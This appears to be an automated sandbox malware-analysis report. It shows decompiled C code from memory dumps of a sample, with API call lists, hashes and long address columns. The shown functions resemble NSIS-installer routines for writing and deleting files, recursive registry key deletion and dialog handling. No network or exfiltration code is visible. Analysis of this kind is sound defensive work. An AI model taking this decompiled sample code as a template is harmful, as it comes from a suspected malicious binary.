							E004031B7(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405DA1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E8D( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004031B7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                                                                                                                                                                          0x004027df
                                                                                                                                                                                                          0x004027e1
                                                                                                                                                                                                          0x004027ed
                                                                                                                                                                                                          0x004027f0
                                                                                                                                                                                                          0x004027fa
                                                                                                                                                                                                          0x004027fe
                                                                                                                                                                                                          0x004027fe
                                                                                                                                                                                                          0x00402804
                                                                                                                                                                                                          0x00402811
                                                                                                                                                                                                          0x00402819
                                                                                                                                                                                                          0x0040281c
                                                                                                                                                                                                          0x00402822
                                                                                                                                                                                                          0x00402830
                                                                                                                                                                                                          0x00402835
                                                                                                                                                                                                          0x00402839
                                                                                                                                                                                                          0x0040283c
                                                                                                                                                                                                          0x00402845
                                                                                                                                                                                                          0x00402851
                                                                                                                                                                                                          0x00402855
                                                                                                                                                                                                          0x00402858
                                                                                                                                                                                                          0x00402862
                                                                                                                                                                                                          0x00402887
                                                                                                                                                                                                          0x00402869
                                                                                                                                                                                                          0x0040286e
                                                                                                                                                                                                          0x00402876
                                                                                                                                                                                                          0x0040287c
                                                                                                                                                                                                          0x00402881
                                                                                                                                                                                                          0x00402881
                                                                                                                                                                                                          0x0040288e
                                                                                                                                                                                                          0x0040288e
                                                                                                                                                                                                          0x0040289b
                                                                                                                                                                                                          0x004028a1
                                                                                                                                                                                                          0x004028b3
                                                                                                                                                                                                          0x004028b3
                                                                                                                                                                                                          0x004028b9
                                                                                                                                                                                                          0x004028b9
                                                                                                                                                                                                          0x004028c4
                                                                                                                                                                                                          0x004028c5
                                                                                                                                                                                                          0x004028c9
                                                                                                                                                                                                          0x004028cd
                                                                                                                                                                                                          0x004028d3
                                                                                                                                                                                                          0x004028d3
                                                                                                                                                                                                          0x004028da
                                                                                                                                                                                                          0x004022dd
                                                                                                                                                                                                          0x00402a5d
                                                                                                                                                                                                          0x00402a69

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 0040288E
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004028B9
                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                                          • Opcode ID: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                                                                                                                                                          • Instruction ID: 6e19ad8f311a8fe4d121ff6d49c8506e1ed5368105aa9b5939d25a16afe37da6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0219F72800124BBDF217FA5CE48D9E7E79EF09324F14823EF450762D1CA7949418FA8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 72E31837, Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                          			E72E31837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x72e3405c = _a8;
				_t77 = 0;
				 *0x72e34060 = _a16;
				_v12 = 0;
				_v8 = E72E3123B();
				_t90 = E72E312FE(_t42);
				_t87 = _t85;
				_t81 = E72E3123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E72E3123B();
					_t77 = E72E312FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E72E31429(_t85, _t90, _t87,  &_v52);
								E72E31266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E72E32EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E72E32F10(_t59, _t83, _t85);
						} else {
							_t48 = E72E32F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E72E32D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E72E32E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E72E32D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}





























                                                                                                                                                                                                          0x72e31837
                                                                                                                                                                                                          0x72e31841
                                                                                                                                                                                                          0x72e3184a
                                                                                                                                                                                                          0x72e3184d
                                                                                                                                                                                                          0x72e31852
                                                                                                                                                                                                          0x72e3185b
                                                                                                                                                                                                          0x72e31864
                                                                                                                                                                                                          0x72e31866
                                                                                                                                                                                                          0x72e3186d
                                                                                                                                                                                                          0x72e3186f
                                                                                                                                                                                                          0x72e31872
                                                                                                                                                                                                          0x72e31876
                                                                                                                                                                                                          0x72e31882
                                                                                                                                                                                                          0x72e3188b
                                                                                                                                                                                                          0x72e31890
                                                                                                                                                                                                          0x72e31893
                                                                                                                                                                                                          0x72e31899
                                                                                                                                                                                                          0x72e31899
                                                                                                                                                                                                          0x72e3189c
                                                                                                                                                                                                          0x72e3189f
                                                                                                                                                                                                          0x72e318a2
                                                                                                                                                                                                          0x72e31968
                                                                                                                                                                                                          0x72e31968
                                                                                                                                                                                                          0x72e3196b
                                                                                                                                                                                                          0x72e319e5
                                                                                                                                                                                                          0x72e319e9
                                                                                                                                                                                                          0x72e319f8
                                                                                                                                                                                                          0x72e319fb
                                                                                                                                                                                                          0x72e31a03
                                                                                                                                                                                                          0x72e31a03
                                                                                                                                                                                                          0x72e31a03
                                                                                                                                                                                                          0x72e31a05
                                                                                                                                                                                                          0x72e31a05
                                                                                                                                                                                                          0x72e31a06
                                                                                                                                                                                                          0x72e31a06
                                                                                                                                                                                                          0x72e31a08
                                                                                                                                                                                                          0x72e31a0a
                                                                                                                                                                                                          0x72e31a10
                                                                                                                                                                                                          0x72e31a19
                                                                                                                                                                                                          0x72e31a2a
                                                                                                                                                                                                          0x72e31a35
                                                                                                                                                                                                          0x72e31a35
                                                                                                                                                                                                          0x72e319fd
                                                                                                                                                                                                          0x72e319e0
                                                                                                                                                                                                          0x72e319e0
                                                                                                                                                                                                          0x72e319e2
                                                                                                                                                                                                          0x72e319e2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319e2
                                                                                                                                                                                                          0x72e319ff
                                                                                                                                                                                                          0x72e31a01
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31a01
                                                                                                                                                                                                          0x72e319ed
                                                                                                                                                                                                          0x72e319f1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319f1
                                                                                                                                                                                                          0x72e3196d
                                                                                                                                                                                                          0x72e3196d
                                                                                                                                                                                                          0x72e3196e
                                                                                                                                                                                                          0x72e319d7
                                                                                                                                                                                                          0x72e319d9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319db
                                                                                                                                                                                                          0x72e319de
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319de
                                                                                                                                                                                                          0x72e31970
                                                                                                                                                                                                          0x72e31970
                                                                                                                                                                                                          0x72e31971
                                                                                                                                                                                                          0x72e319aa
                                                                                                                                                                                                          0x72e319ae
                                                                                                                                                                                                          0x72e319ca
                                                                                                                                                                                                          0x72e319cd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319cf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319d1
                                                                                                                                                                                                          0x72e319d3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319d5
                                                                                                                                                                                                          0x72e319b0
                                                                                                                                                                                                          0x72e319b4
                                                                                                                                                                                                          0x72e319b6
                                                                                                                                                                                                          0x72e319b8
                                                                                                                                                                                                          0x72e319ba
                                                                                                                                                                                                          0x72e319c3
                                                                                                                                                                                                          0x72e319bc
                                                                                                                                                                                                          0x72e319bc
                                                                                                                                                                                                          0x72e319bc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319ba
                                                                                                                                                                                                          0x72e31973
                                                                                                                                                                                                          0x72e31973
                                                                                                                                                                                                          0x72e31976
                                                                                                                                                                                                          0x72e319a3
                                                                                                                                                                                                          0x72e319a5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319a5
                                                                                                                                                                                                          0x72e31978
                                                                                                                                                                                                          0x72e31978
                                                                                                                                                                                                          0x72e3197b
                                                                                                                                                                                                          0x72e3198b
                                                                                                                                                                                                          0x72e3198f
                                                                                                                                                                                                          0x72e3199c
                                                                                                                                                                                                          0x72e3199e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3199e
                                                                                                                                                                                                          0x72e31991
                                                                                                                                                                                                          0x72e31993
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31995
                                                                                                                                                                                                          0x72e31998
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3199a
                                                                                                                                                                                                          0x72e3197e
                                                                                                                                                                                                          0x72e3197f
                                                                                                                                                                                                          0x72e31985
                                                                                                                                                                                                          0x72e31987
                                                                                                                                                                                                          0x72e31987
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3197f
                                                                                                                                                                                                          0x72e318a8
                                                                                                                                                                                                          0x72e31920
                                                                                                                                                                                                          0x72e31922
                                                                                                                                                                                                          0x72e31925
                                                                                                                                                                                                          0x72e31943
                                                                                                                                                                                                          0x72e31946
                                                                                                                                                                                                          0x72e3194c
                                                                                                                                                                                                          0x72e31951
                                                                                                                                                                                                          0x72e31927
                                                                                                                                                                                                          0x72e31927
                                                                                                                                                                                                          0x72e3192b
                                                                                                                                                                                                          0x72e3192f
                                                                                                                                                                                                          0x72e31931
                                                                                                                                                                                                          0x72e31931
                                                                                                                                                                                                          0x72e31954
                                                                                                                                                                                                          0x72e31957
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3195d
                                                                                                                                                                                                          0x72e3195d
                                                                                                                                                                                                          0x72e31960
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31960
                                                                                                                                                                                                          0x72e31957
                                                                                                                                                                                                          0x72e318aa
                                                                                                                                                                                                          0x72e318ad
                                                                                                                                                                                                          0x72e31911
                                                                                                                                                                                                          0x72e31913
                                                                                                                                                                                                          0x72e31915
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3191b
                                                                                                                                                                                                          0x72e318af
                                                                                                                                                                                                          0x72e318b2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e318b4
                                                                                                                                                                                                          0x72e318b5
                                                                                                                                                                                                          0x72e318eb
                                                                                                                                                                                                          0x72e318ef
                                                                                                                                                                                                          0x72e31907
                                                                                                                                                                                                          0x72e31909
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31909
                                                                                                                                                                                                          0x72e318f1
                                                                                                                                                                                                          0x72e318f3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e318f9
                                                                                                                                                                                                          0x72e318fc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31902
                                                                                                                                                                                                          0x72e318b7
                                                                                                                                                                                                          0x72e318ba
                                                                                                                                                                                                          0x72e318e1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e318bc
                                                                                                                                                                                                          0x72e318bc
                                                                                                                                                                                                          0x72e318bd
                                                                                                                                                                                                          0x72e318d1
                                                                                                                                                                                                          0x72e318d3
                                                                                                                                                                                                          0x72e318bf
                                                                                                                                                                                                          0x72e318c1
                                                                                                                                                                                                          0x72e318c7
                                                                                                                                                                                                          0x72e318c9
                                                                                                                                                                                                          0x72e318c9
                                                                                                                                                                                                          0x72e318c1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e318bd

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167878164.0000000072E31000.00000020.00020000.sdmp, Offset: 72E30000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167873253.0000000072E30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167884351.0000000072E33000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167889901.0000000072E35000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeGlobal
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2979337801-0
                                                                                                                                                                                                          • Opcode ID: 0596f453eac5647b640ead29f94240e48f46d8e07c078325f79090761284308e
                                                                                                                                                                                                          • Instruction ID: 03b6ef715e458e74563918a2f9f8bfd7195af556b71040e25202c9ed21437cea
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0596f453eac5647b640ead29f94240e48f46d8e07c078325f79090761284308e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9451D472D04198AEDF038FACC8446ADBBB5AB4534FFD5E09EE406AB107C6319942C771
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                                          			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060D3(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406656(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                                                                                                                                          0x00402cdb
                                                                                                                                                                                                          0x00402ce4
                                                                                                                                                                                                          0x00402ced
                                                                                                                                                                                                          0x00402cf9
                                                                                                                                                                                                          0x00402d02
                                                                                                                                                                                                          0x00402d0c
                                                                                                                                                                                                          0x00402d31
                                                                                                                                                                                                          0x00402d37
                                                                                                                                                                                                          0x00402d3c
                                                                                                                                                                                                          0x00402d3d
                                                                                                                                                                                                          0x00402d6d
                                                                                                                                                                                                          0x00402d46
                                                                                                                                                                                                          0x00402d48
                                                                                                                                                                                                          0x00402d98
                                                                                                                                                                                                          0x00402d9b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00402da1
                                                                                                                                                                                                          0x00402d57
                                                                                                                                                                                                          0x00402d5c
                                                                                                                                                                                                          0x00402d5e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00402d66
                                                                                                                                                                                                          0x00402d6b
                                                                                                                                                                                                          0x00402d6c
                                                                                                                                                                                                          0x00402d6c
                                                                                                                                                                                                          0x00402d79
                                                                                                                                                                                                          0x00402d81
                                                                                                                                                                                                          0x00402d88
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00402db1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00402d90
                                                                                                                                                                                                          0x00402d1c
                                                                                                                                                                                                          0x00402d2f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00402d2f
                                                                                                                                                                                                          0x00402db7

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1354259210-0
                                                                                                                                                                                                          • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                                                                                                                                                          • Instruction ID: d75478e88f471254037528958efdeb905634950da4f4823c7bb408bf4a1a64a1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48E54AA68
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                          			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f440,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                                                                                                                                          0x00401d65
                                                                                                                                                                                                          0x00401d69
                                                                                                                                                                                                          0x00401d7e
                                                                                                                                                                                                          0x00401d6b
                                                                                                                                                                                                          0x00401d6d
                                                                                                                                                                                                          0x00401d73
                                                                                                                                                                                                          0x00401d73
                                                                                                                                                                                                          0x00401d84
                                                                                                                                                                                                          0x00401d87
                                                                                                                                                                                                          0x00401d91
                                                                                                                                                                                                          0x00401d94
                                                                                                                                                                                                          0x00401d9c
                                                                                                                                                                                                          0x00401dad
                                                                                                                                                                                                          0x00401db0
                                                                                                                                                                                                          0x00401dbb
                                                                                                                                                                                                          0x00401db2
                                                                                                                                                                                                          0x00401db4
                                                                                                                                                                                                          0x00401db4
                                                                                                                                                                                                          0x00401dbf
                                                                                                                                                                                                          0x00401dcc
                                                                                                                                                                                                          0x00401df3
                                                                                                                                                                                                          0x00401e02
                                                                                                                                                                                                          0x00401e10
                                                                                                                                                                                                          0x00401e18
                                                                                                                                                                                                          0x00401e20
                                                                                                                                                                                                          0x00401e20
                                                                                                                                                                                                          0x00401e29
                                                                                                                                                                                                          0x00401e2f
                                                                                                                                                                                                          0x004029a5
                                                                                                                                                                                                          0x004029a5
                                                                                                                                                                                                          0x00402a5d
                                                                                                                                                                                                          0x00402a69

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
